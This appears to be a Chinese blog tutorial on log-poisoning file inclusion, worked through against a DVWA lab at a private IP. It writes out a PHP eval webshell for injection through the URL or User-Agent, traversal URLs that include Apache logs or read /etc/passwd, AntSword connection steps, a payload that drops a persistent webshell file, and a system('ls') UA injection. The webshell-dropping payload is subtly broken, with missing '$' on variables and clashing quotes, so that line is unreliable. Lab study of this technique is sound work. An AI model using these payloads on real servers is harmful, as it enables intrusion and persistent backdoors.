文件包含日志漏洞

包含日志文件入侵(Apache、Nginx 等均有)

(1) 浏览 URL 长度有限制,不能将攻击代码(太长)直接输入,可输入一句话木马进行攻击

(2) Apache 运行后生成两个日志文件(access.log 和 error.log 访问日志和 error.log 错误日志),当我们访问网站时,其中的部分信息会写入 access.log

攻击的思路:

(1)在user-agent,referer或url栏参数中插入一句话木马
(2)web服务器会把这些请求记录到访问日志中
(3)诱导应用包含这个日志文件,使其中的恶意代码执行
Apache 默认日志路径:/var/log/apache/access.log  /var/log/apache2/access.log

Nginx 默认日志路径:/var/log/nginx/access.log  /var/log/nginx/error.log

(1)进行敏感日志信息收集,访问日志文件, 得先判断日志文件记录的是 URL 栏还是user-agent,referer等,再决定往哪里注入payload

例如注入/?page=<?php @eval($_POST['sb']);?>

(2)利用日志遍历漏洞来访问 access.log,使上述代码执行

相对路径:
http://192.168.1.55/dvwa/vulnerabilities/fi/?page=../../../../../Apache2/logs/access.log

绝对路径:
http://192.168.1.55/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log

注:浏览器会自动对空格、点号、/、?&等字符编码,再发送到服务端

可用 BP 抓包后修改 URL 参数为正常的 ../../../../../etc/passwd

(3)蚁剑来连接

右键->添加数据,url为日志文件的,即http://192.168.1.55/dvwa/vulnerabilities/fi/?page=/var/log/apache2/access.log

注:若蚁剑连不上,可以通过日志文件专门去生成一个一句话木马文件(可以在referer等注入,下面以url栏为例)

1访问/fi/?page=<?php file = fopen('hu.php', 'w'); fputs(file, '<?php @eval($_POST['sb']);?>'); ?>
2同上去访问日志文件/fi/?page=/var/log/apache2/access.log
他会创建一个与index.php文件同级目录下的hu.php文件
3打开蚁剑输入xxx/fi/hu.php连接即可 

一、ua头注入

注入<?php echo system('ls');?>

image-20260517202632060

posted @ 2026-06-18 13:01  Doll_Marker  阅读(10)  评论(0)    收藏  举报